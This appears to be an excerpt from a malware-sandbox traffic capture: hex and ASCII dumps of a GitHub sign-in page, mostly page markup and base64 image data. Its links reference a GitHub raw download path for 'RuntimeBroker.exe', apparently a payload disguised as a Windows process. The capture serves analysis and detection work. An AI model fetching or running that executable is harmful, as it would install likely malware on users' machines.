61 2d 6c 61 62 65 6c 3d 22 52
                                                                                              Data Ascii: nter jump-to-suggestions-path js-jump-to-suggestion-path js-navigation-open p-2" href="" data-item-type="scoped_search"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="R
                                                                                              2022-08-10 04:47:59 UTC290INData Raw: 2e 35 20 30 76 2d 37 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 30 2d 2e 37 35 2d 2e 37 35 7a 6d 2d 38 2e 32 35 2e 37 35 61 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 35 20 30 76 35 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 35 20 30 76 2d 35 2e 35 7a 4d 38 20 33 61 2e 37 35 2e 37 35 20 30 20 30 30 2d 2e 37 35 2e 37 35 76 33 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 30 31 2e 35 20 30 76 2d 33 2e 35 41 2e 37 35 2e 37 35 20 30 20 30 30 38 20 33 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 20 20 3c 73 76 67 20 74 69 74 6c 65 3d 22 53 65 61 72 63 68 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 53 65 61 72 63 68 22 20 72 6f 6c 65 3d 22 69 6d 67 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20
                                                                                              Data Ascii: .5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16"
                                                                                              2022-08-10 04:47:59 UTC292INData Raw: 22 20 63 6c 61 73 73 3d 22 62 6f 72 64 65 72 20 72 6f 75 6e 64 65 64 2d 32 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 63 6f 6c 6f 72 2d 62 67 2d 73 75 62 74 6c 65 20 70 78 2d 31 20 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 20 6d 6c 2d 31 20 66 36 20 64 2d 6e 6f 6e 65 20 64 2d 6f 6e 2d 6e 61 76 2d 66 6f 63 75 73 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 6a 75 6d 70 22 3e 0a 20 20 20 20 20 20 4a 75 6d 70 20 74 6f 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 64 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 6d 6c 2d 31 20 76 2d 61 6c 69 67 6e 2d 6d 69 64 64 6c 65 22 3e e2 86 b5 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 0a 20 20 0a 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 64 2d 66 6c 65
                                                                                              Data Ascii: " class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span class="d-inline-block ml-1 v-align-middle"></span> </div> </a></li> <li class="d-fle
                                                                                              2022-08-10 04:47:59 UTC293INData Raw: 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 70 72 6f 6a 65 63 74 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 2d 70 72 6f 6a 65 63 74 20 64 2d 6e 6f 6e 65 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 2e 37 35 20 30 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 30 20 31 2e 37 35 76 31 32 2e 35 43 30 20 31 35 2e 32 31 36 2e 37 38 34 20 31 36 20 31 2e 37 35 20 31 36 68
                                                                                              Data Ascii: eight="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h
                                                                                              2022-08-10 04:47:59 UTC294INData Raw: 65 78 2d 73 68 72 69 6e 6b 2d 30 20 63 6f 6c 6f 72 2d 62 67 2d 73 75 62 74 6c 65 20 70 78 2d 31 20 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 20 6d 6c 2d 31 20 66 36 20 64 2d 6e 6f 6e 65 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 73 65 61 72 63 68 22 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 73 65 61 72 63 68 2d 74 65 78 74 2d 64 65 66 61 75 6c 74 20 64 2d 6e 6f 6e 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 69 6e 20 61 6c 6c 20 6f 66 20 47 69 74 48 75 62 22 3e 0a 20 20 20 20 20 20 20 20 53 65 61 72 63 68 0a 20 20 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 73 65 61 72 63 68
                                                                                              Data Ascii: ex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span class="js-jump-to-badge-search-text-default d-none" aria-label="in all of GitHub"> Search </span> <span class="js-jump-to-badge-search
                                                                                              2022-08-10 04:47:59 UTC296INData Raw: 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 20 32 2e 35 41 32 2e 35 20 32 2e 35 20 30 20 30 31 34 2e 35 20 30 68 38 2e 37 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2e 37 35 2e 37 35 76 31 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 2e 37 35 2e 37 35 68 2d 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 31 31 30 2d 31 2e 35 68 31 2e 37 35 76 2d 32 68 2d 38 61 31 20 31 20 30 20 30 30 2d 2e 37 31 34 20 31 2e 37 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 30 37 32 20 31 2e 30 35 41 32 2e 34 39 35 20 32 2e 34 39 35 20 30 20 30 31 32 20 31 31 2e 35 76 2d 39 7a 6d 31 30 2e 35 2d 31 56 39 68 2d 38 63 2d 2e 33 35 36 20 30 2d 2e 36 39 34 2e 30 37 34 2d 31 20 2e 32 30 38 56 32 2e 35 61 31 20 31 20 30 20 30 31 31 2d 31 68 38 7a 4d 35 20 31 32 2e 32 35 76 33 2e 32 35 61
                                                                                              Data Ascii: e="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a
                                                                                              2022-08-10 04:47:59 UTC297INData Raw: 34 39 39 20 34 2e 34 39 39 20 30 20 30 31 31 31 2e 35 20 37 7a 6d 2d 2e 38 32 20 34 2e 37 34 61 36 20 36 20 30 20 31 31 31 2e 30 36 2d 31 2e 30 36 6c 33 2e 30 34 20 33 2e 30 34 61 2e 37 35 2e 37 35 20 30 20 31 31 2d 31 2e 30 36 20 31 2e 30 36 6c 2d 33 2e 30 34 2d 33 2e 30 34 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 61 76 61 74 61 72 20 6d 72 2d 32 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 2d 61 76 61 74 61 72 20 64 2d 6e 6f 6e 65 22 20 61 6c 74 3d 22 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 54 65 61 6d 22 20 73 72 63 3d 22 22 20 77 69 64 74 68 3d 22 32 38 22 20 68 65 69 67 68 74 3d 22 32 38 22
                                                                                              Data Ascii: 499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div> <img class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion-avatar d-none" alt="" aria-label="Team" src="" width="28" height="28"
                                                                                              2022-08-10 04:47:59 UTC298INData Raw: 6f 77 67 65 72 72 69 65 25 32 46 72 65 62 6f 72 6e 25 32 46 72 61 77 25 32 46 6d 61 69 6e 25 32 46 30 34 25 32 46 52 75 6e 74 69 6d 65 42 72 6f 6b 65 72 2e 65 78 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 6c 69 6e 6b 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 68 79 64 72 6f 2d 63 6c 69 63 6b 3d 22 7b 26 71 75 6f 74 3b 65 76 65 6e 74 5f 74 79 70 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 2e 63 6c 69 63 6b 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 70 61 79 6c 6f 61 64 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 6c 6f 63 61 74 69 6f 6e 5f 69 6e 5f 70 61 67 65 26 71 75 6f 74
                                                                                              Data Ascii: owgerrie%2Freborn%2Fraw%2Fmain%2F04%2FRuntimeBroker.exe" class="HeaderMenu-link flex-shrink-0 no-underline" data-hydro-click="{&quot;event_type&quot;:&quot;authentication.click&quot;,&quot;payload&quot;:{&quot;location_in_page&quot
                                                                                              2022-08-10 04:47:59 UTC300INData Raw: 65 6e 22 20 76 61 6c 75 65 3d 22 42 6b 71 52 4a 59 54 4c 59 45 37 49 77 75 74 73 57 49 61 47 73 49 37 56 36 75 35 55 4e 48 4e 64 49 72 78 4f 46 39 4a 66 6f 59 41 6c 39 6b 6e 33 66 77 52 53 54 47 71 74 4e 39 56 5a 79 41 43 42 4b 75 58 35 68 35 57 6d 6a 59 57 37 57 31 4c 41 66 79 46 6b 4f 51 22 20 2f 3e 20 20 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 6c 6f 67 69 6e 5f 66 69 65 6c 64 22 3e 0a 20 20 20 20 55 73 65 72 6e 61 6d 65 20 6f 72 20 65 6d 61 69 6c 20 61 64 64 72 65 73 73 0a 20 20 3c 2f 6c 61 62 65 6c 3e 0a 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 6c 6f 67 69 6e 22 20 69 64 3d 22 6c 6f 67 69 6e 5f 66 69 65 6c 64 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 20 69 6e 70 75 74 2d 62 6c 6f 63 6b 20 6a 73
                                                                                              Data Ascii: en" value="BkqRJYTLYE7IwutsWIaGsI7V6u5UNHNdIrxOF9JfoYAl9kn3fwRSTGqtN9VZyACBKuX5h5WmjYW7W1LAfyFkOQ" /> <label for="login_field"> Username or email address </label> <input type="text" name="login" id="login_field" class="form-control input-block js
                                                                                              2022-08-10 04:47:59 UTC301INData Raw: 6e 74 72 6f 6c 22 20 2f 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 72 65 71 75 69 72 65 64 5f 66 69 65 6c 64 5f 36 31 31 64 22 20 68 69 64 64 65 6e 3d 22 68 69 64 64 65 6e 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 74 69 6d 65 73 74 61 6d 70 22 20 76 61 6c 75 65 3d 22 31 36 36 30 31 30 36 38 37 39 36 30 31 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 74 69 6d 65 73 74 61 6d 70 5f 73 65 63 72 65 74 22 20 76 61 6c 75 65 3d 22 33 61 66 64 33 38
                                                                                              Data Ascii: ntrol" /><input type="text" name="required_field_611d" hidden="hidden" class="form-control" /><input type="hidden" name="timestamp" value="1660106879601" autocomplete="off" class="form-control" /><input type="hidden" name="timestamp_secret" value="3afd38
                                                                                              2022-08-10 04:47:59 UTC302INData Raw: 69 6e 2f 30 34 2f 52 75 6e 74 69 6d 65 42 72 6f 6b 65 72 2e 65 78 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 75 73 65 72 5f 69 64 26 71 75 6f 74 3b 3a 6e 75 6c 6c 7d 7d 22 20 64 61 74 61 2d 68 79 64 72 6f 2d 63 6c 69 63 6b 2d 68 6d 61 63 3d 22 37 35 30 32 32 37 34 31 62 34 32 33 39 36 37 32 34 33 62 35 32 35 33 34 34 61 35 33 39 36 61 66 38 61 61 39 36 36 64 35 30 65 62 35 61 31 65 61 33 38 32 38 63 38 65 37 32 39 38 62 35 66 63 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 53 69 67 6e 20 75 70 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74
                                                                                              Data Ascii: in/04/RuntimeBroker.exe&quot;,&quot;user_id&quot;:null}}" data-hydro-click-hmac="75022741b423967243b525344a5396af8aa966d50eb5a1ea3828c8e7298b5fc2" data-analytics-event="{&quot;category&quot;:&quot;Sign up&quot;,&quot;action&quot;:&quot;click t
                                                                                              2022-08-10 04:47:59 UTC303INData Raw: 46 46 41 43 0d 0a 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 78 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 33 2e 37 32 20 33 2e 37 32 61 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 30 36 20 30 4c 38 20 36 2e 39 34 6c 33 2e 32 32 2d 33 2e 32 32 61 2e 37 35 2e 37 35 20 30 20 31 31 31 2e 30 36 20 31 2e 30 36 4c 39 2e 30 36 20 38 6c 33 2e 32 32 20 33 2e 32 32 61 2e 37 35 2e 37 35 20 30 20 31 31 2d 31 2e 30 36 20 31 2e 30 36 4c 38 20 39 2e 30 36 6c 2d 33 2e 32 32 20 33 2e 32 32 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 30 36 2d 31 2e 30 36 4c 36 2e 39 34 20 38 20 33 2e 37 32 20 34 2e 37
                                                                                              Data Ascii: FFAC data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.7
                                                                                              2022-08-10 04:47:59 UTC305INData Raw: 44 67 38 50 44 41 77 4d 44 41 77 50 44 77 77 4d 44 41 77 4d 44 41 38 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 2f 38 41 41 45 51 67 42 6e 77 4f 73 41 77 45 52 41 41 49 52 41 51 4d 52 41 66 2f 45 41 4c 59 41 41 41 4d 42 41 51 45 42 41 51 41 41 41 41 41 41 41 41 41 41 41 41 45 43 41 77 41 45 42 51 59 49 41 51 45 42 41 51 45 42 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 51 49 44 42 41 63 51 41 41 45 44 41 77 4d 43 41 77 55 47 42 41 45 47 43 77 67 43 41 77 45 41 45 53 45 78 41 68 4a 42 55 57 46 78 67 5a 47 68 41 2f 43 78 77 53 49 54 30 65 48 78 4d 67 51 46 51 67 59 48 46 31 4a 69 30 69 50 54 46 42 56 79 67 70 4c 43 4d 32 4f 44 6b 79 51 6c 4e 61 4b 79 55 36 4f 7a 4e 45 56 56 63 30 52
                                                                                              Data Ascii: Dg8PDAwMDAwPDwwMDAwMDA8MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwM/8AAEQgBnwOsAwERAAIRAQMRAf/EALYAAAMBAQEBAQAAAAAAAAAAAAECAwAEBQYIAQEBAQEBAQAAAAAAAAAAAAAAAQIDBAcQAAEDAwMCAwUGBAEGCwgCAwEAESExAhJBUWFxgZGhA/CxwSIT0eHxMgQFQgYHF1Ji0iPTFBVygpLCM2ODkyQlNaKyU6OzNEVVc0R
                                                                                              2022-08-10 04:47:59 UTC306INData Raw: 70 73 65 61 49 74 4c 39 4e 51 49 62 44 71 6f 70 44 59 4f 36 42 66 70 68 54 4b 34 49 62 4f 50 42 52 55 38 57 68 75 36 42 63 5a 68 52 53 34 74 32 55 55 70 74 65 45 71 78 4d 32 6d 72 39 30 43 47 32 43 69 6b 4e 70 32 64 31 43 46 4e 71 67 58 45 37 49 4f 45 43 42 48 52 64 48 4f 6d 41 62 70 6f 71 68 67 50 46 55 55 41 34 36 49 68 32 6c 58 41 63 57 37 55 33 52 44 67 61 30 34 56 51 34 47 79 42 78 61 2f 78 52 4f 63 34 44 4b 6f 66 47 56 51 34 74 6e 37 45 52 51 57 6a 5a 57 49 63 57 2f 65 69 6e 46 70 31 56 53 6d 46 74 46 55 55 46 70 53 4c 54 43 7a 38 56 57 54 69 31 51 4f 4c 55 44 43 78 31 55 4d 4c 51 46 59 68 78 62 73 45 44 43 31 41 34 73 56 53 6d 46 67 51 70 38 55 4f 55 63 56 55 4e 67 64 6b 68 54 69 77 6f 55 52 59 64 6c 55 4d 4c 43 6e 4d 63 35 73 50 77 51 4e 39 4e 45
                                                                                              Data Ascii: pseaItL9NQIbDqopDYO6BfphTK4IbOPBRU8Whu6BcZhRS4t2UUpteEqxM2mr90CG2CikNp2d1CFNqgXE7IOECBHRdHOmAbpoqhgPFUUA46Ih2lXAcW7U3RDga04VQ4GyBxa/xROc4DKofGVQ4tn7ERQWjZWIcW/einFp1VSmFtFUUFpSLTCz8VWTi1QOLUDCx1UMLQFYhxbsEDC1A4sVSmFgQp8UOUcVUNgdkhTiwoURYdlUMLCnMc5sPwQN9NE
                                                                                              2022-08-10 04:47:59 UTC307INData Raw: 57 49 68 73 41 67 49 73 47 79 71 47 46 76 43 4c 79 47 77 4b 49 49 39 4d 6f 55 33 30 39 30 6f 50 30 77 6c 44 43 77 62 49 44 69 4e 6c 63 4a 6b 63 65 79 41 34 6f 44 69 6e 4d 66 45 52 59 67 4f 43 41 34 42 41 63 41 68 57 77 53 67 34 63 49 67 34 63 49 44 69 71 4e 68 77 6f 6f 34 6c 42 73 55 51 63 45 47 77 52 52 77 53 70 6c 73 46 46 62 46 57 46 6f 34 6c 41 4d 53 6f 44 69 71 59 62 46 42 73 56 49 56 73 65 46 52 73 54 73 6f 6f 34 6e 5a 42 73 4f 45 41 78 56 47 77 43 6c 47 77 43 55 62 41 4a 53 4e 39 4d 49 4e 39 4d 49 4e 39 50 5a 53 72 41 77 34 52 65 55 4d 45 51 75 43 44 59 4b 4e 53 68 67 71 67 47 30 37 4b 4b 32 48 43 41 59 49 42 39 4e 51 44 36 66 4b 69 30 4d 45 41 77 51 44 41 62 49 75 4d 6c 77 47 79 69 67 62 42 73 67 58 41 4b 49 47 43 4b 55 32 71 52 53 34 71 5a 58 42
                                                                                              Data Ascii: WIhsAgIsGyqGFvCLyGwKII9MoU3090oP0wlDCwbIDiNlcJkceyA4oDinMfERYgOCA4BAcAhWwSg4cIg4cIDiqNhwoo4lBsUQcEGwRRwSplsFFbFWFo4lAMSoDiqYbFBsVIVseFRsTsoo4nZBsOEAxVGwClGwCUbAJSN9MIN9MIN9PZSrAw4ReUMEQuCDYKNShgqgG07KK2HCAYIB9NQD6fKi0MEAwQDAbIuMlwGyigbBsgXAKIGCKU2qRS4qZXB
                                                                                              2022-08-10 04:47:59 UTC309INData Raw: 36 59 32 55 79 75 43 48 30 78 73 69 6b 4e 68 43 68 67 70 74 55 55 68 73 34 52 53 47 31 41 68 74 52 53 47 7a 68 51 49 66 54 4b 4b 51 32 48 62 75 6f 71 64 31 69 69 70 6d 77 71 5a 79 45 4e 69 4c 6a 4b 5a 39 4d 4b 4b 6d 62 4e 6c 46 54 4e 76 43 4b 6d 62 4f 46 41 68 43 6d 63 4b 6e 64 61 66 77 55 56 49 32 6f 53 6c 62 33 55 30 55 69 76 47 46 71 37 31 77 71 67 74 56 52 59 57 38 4a 67 79 63 57 75 7a 61 71 6f 74 62 61 50 76 56 52 51 57 70 67 79 6f 4c 56 57 63 72 43 31 6b 44 69 33 75 69 4b 43 31 57 49 6f 4c 56 59 5a 79 70 62 62 52 45 71 6f 74 4e 4b 71 38 68 79 6e 46 70 56 51 34 73 4b 71 48 46 68 4b 71 4b 6a 30 31 4b 48 46 69 42 78 59 67 63 65 6d 45 53 6d 46 6f 45 4d 71 68 78 5a 77 71 48 46 69 42 78 5a 77 6b 53 2f 41 77 74 56 69 48 46 71 59 77 6f 69 31 57 49 62 42 41
                                                                                              Data Ascii: 6Y2UyuCH0xsikNhChgptUUhs4RSG1AhtRSGzhQIfTKKQ2Hbuoqd1iipmwqZyENiLjKZ9MKKmbNlFTNvCKmbOFAhCmcKndafwUVI2oSlb3U0UivGFq71wqgtVRYW8JgycWuzaqotbaPvVRQWpgyoLVWcrC1kDi3uiKC1WIoLVYZypbbREqotNKq8hynFpVQ4sKqHFhKqKj01KHFiBxYgcemESmFoEMqhxZwqHFiBxZwkS/AwtViHFqYwoi1WIbBA
                                                                                              2022-08-10 04:47:59 UTC310INData Raw: 51 77 73 56 49 62 42 41 63 55 42 78 51 67 69 31 44 4f 44 59 38 46 43 44 67 64 6c 51 63 45 42 77 55 77 5a 4d 4c 46 53 74 67 46 4b 44 67 46 55 6f 69 30 64 55 4b 4f 41 32 55 6f 4f 48 41 51 70 73 56 55 62 48 6c 52 52 78 51 6a 59 71 6f 32 49 55 57 44 69 46 53 4e 69 45 67 7a 44 5a 52 52 78 34 56 51 63 65 45 49 32 4a 32 53 4b 4f 4a 53 44 59 70 42 73 65 55 42 78 43 51 79 32 49 53 47 42 78 47 79 6d 65 51 35 32 78 34 53 44 4d 68 6a 44 4d 69 78 6d 43 4a 42 5a 41 4d 51 67 4f 49 32 52 57 77 34 55 47 77 56 47 77 35 55 6f 32 47 35 53 67 59 48 64 42 73 45 6f 32 48 44 71 56 51 78 47 79 44 59 42 52 57 77 47 67 43 71 42 67 6f 6f 59 49 42 69 69 78 73 53 68 47 59 37 49 51 4d 65 45 47 77 34 55 41 77 53 68 66 70 6c 52 51 50 70 6f 59 79 48 30 77 68 53 34 42 54 2f 34 76 2f 77 42
                                                                                              Data Ascii: QwsVIbBAcUBxQgi1DODY8FCDgdlQcEBwUwZMLFStgFKDgFUoi0dUKOA2UoOHAQpsVUbHlRRxQjYqo2IUWDiFSNiEgzDZRRx4VQceEI2J2SKOJSDYpBseUBxCQy2ISGBxGymeQ52x4SDMhjDMixmCJBZAMQgOI2RWw4UGwVGw5Uo2G5SgYHdBsEo2HDqVQxGyDYBRWwGgCqBgooYIBiixsShGY7IQMeEGw4UAwShfplRQPpoYyH0whS4BT/4v/wB
                                                                                              2022-08-10 04:47:59 UTC311INData Raw: 62 46 6c 53 6d 78 43 6b 4e 6e 43 6a 56 4b 62 47 52 4b 55 32 68 44 6c 49 62 45 56 4d 32 62 4b 4b 51 32 37 6f 71 64 31 69 67 6b 62 57 35 54 4b 34 54 4e 71 67 6b 62 53 46 6c 70 4d 32 75 69 6f 6d 31 53 71 6c 64 62 34 4a 6c 63 59 53 75 74 51 77 6a 64 61 79 69 70 58 57 4b 4c 55 73 53 6f 31 58 6b 43 33 59 4f 75 7a 7a 71 32 32 48 5a 56 46 37 62 43 65 69 47 46 72 62 47 56 53 71 69 7a 6c 58 43 5a 57 74 73 47 69 75 45 79 72 62 59 72 55 56 46 67 32 52 46 72 62 42 73 69 4b 69 33 5a 58 47 44 4b 67 74 56 52 55 57 6f 6d 54 67 4b 77 55 74 73 56 54 4b 67 74 52 44 43 31 43 48 46 71 47 54 69 33 68 30 51 34 74 4a 30 56 77 5a 77 59 57 48 5a 41 34 39 4d 39 4f 46 52 51 57 66 65 69 47 77 43 51 6f 34 71 6f 59 57 53 67 59 57 44 5a 30 57 6d 46 69 71 43 4c 65 46 41 2b 4a 56 51 63 65
                                                                                              Data Ascii: bFlSmxCkNnCjVKbGRKU2hDlIbEVM2bKKQ27oqd1igkbW5TK4TNqgkbSFlpM2uiom1Sqldb4JlcYSutQwjdayipXWKLUsSo1XkC3YOuzzq22HZVF7bCeiGFrbGVSqizlXCZWtsGiuEyrbYrUVFg2RFrbBsiKi3ZXGDKgtVRUWomTgKwUtsVTKgtRDC1CHFqGTi3h0Q4tJ0VwZwYWHZA49M9OFRQWfeiGwCQo4qoYWSgYWDZ0WmFiqCLeFA+JVQce
                                                                                              2022-08-10 04:47:59 UTC313INData Raw: 6f 6a 59 70 51 63 66 4a 41 63 51 68 68 6d 55 6f 4f 50 44 6f 44 6a 77 67 32 4a 32 51 48 45 6f 52 68 61 64 6b 4d 74 69 64 6b 47 78 4b 69 6a 67 56 59 4e 69 55 4d 59 62 45 37 6f 52 73 44 48 6d 67 32 42 4b 63 35 7a 44 67 55 47 77 4a 51 48 41 38 49 4e 68 30 51 48 42 30 6f 32 4a 36 70 52 73 65 45 6f 77 74 34 54 42 6c 73 66 4a 43 4d 78 66 56 53 72 47 36 68 56 49 7a 42 52 51 59 62 49 4d 41 45 4d 73 77 51 5a 76 46 46 44 45 6f 56 6d 4b 44 4d 55 56 6d 51 6a 4e 43 45 62 45 62 4b 55 67 59 65 43 44 59 64 47 51 44 45 70 52 6d 51 5a 6c 43 73 33 64 41 4d 52 73 6c 47 77 6a 33 49 42 69 6c 49 44 62 71 6b 44 48 5a 51 77 47 50 43 4c 79 46 78 45 6f 6f 47 31 6c 41 46 59 67 45 43 69 79 70 54 61 67 55 32 2b 78 52 61 51 68 46 4b 52 77 70 46 4b 62 55 69 45 4e 76 5a 52 61 6d 62 57 52
                                                                                              Data Ascii: ojYpQcfJAcQhhmUoOPDoDjwg2J2QHEoRhadkMtidkGxKijgVYNiUMYbE7oRsDHmg2BKc5zDgUGwJQHA8INh0QHB0o2J6pRseEowt4TBlsfJCMxfVSrG6hVIzBRQYbIMAEMswQZvFFDEoVmKDMUVmQjNCEbEbKUgYeCDYdGQDEpRmQZlCs3dAMRslGwj3IBilIDbqkDHZQwGPCLyFxEooG1lAFYgECiypTagU2+xRaQhFKRwpFKbUiENvZRambWR
                                                                                              2022-08-10 04:47:59 UTC314INData Raw: 6e 30 2f 77 42 48 2b 70 76 66 44 39 50 36 74 37 56 41 73 4a 2b 43 7a 6e 69 4e 6e 70 35 39 57 4f 6e 44 57 4e 68 74 4e 58 4e 70 7a 30 5a 64 4e 6e 37 64 2b 75 75 4c 57 2f 6f 2f 58 75 4a 6f 42 36 64 7a 2b 35 59 7a 78 6d 78 78 69 2f 37 39 50 54 68 63 63 4a 74 73 35 6e 2b 7a 56 30 5a 64 4e 76 37 54 2b 35 61 2f 74 33 36 6e 2f 75 72 2f 41 4c 46 6a 2f 49 63 4e 76 4e 48 61 78 31 74 2f 30 50 45 62 76 56 32 63 39 54 70 48 37 48 2b 38 51 33 37 52 2b 73 4f 33 2b 67 39 54 2f 4e 57 66 38 72 77 6d 2b 30 64 72 54 31 74 66 34 7a 69 39 31 72 37 4f 65 70 30 57 66 79 39 2b 2b 33 68 37 50 32 58 39 66 63 4e 37 66 30 33 71 6e 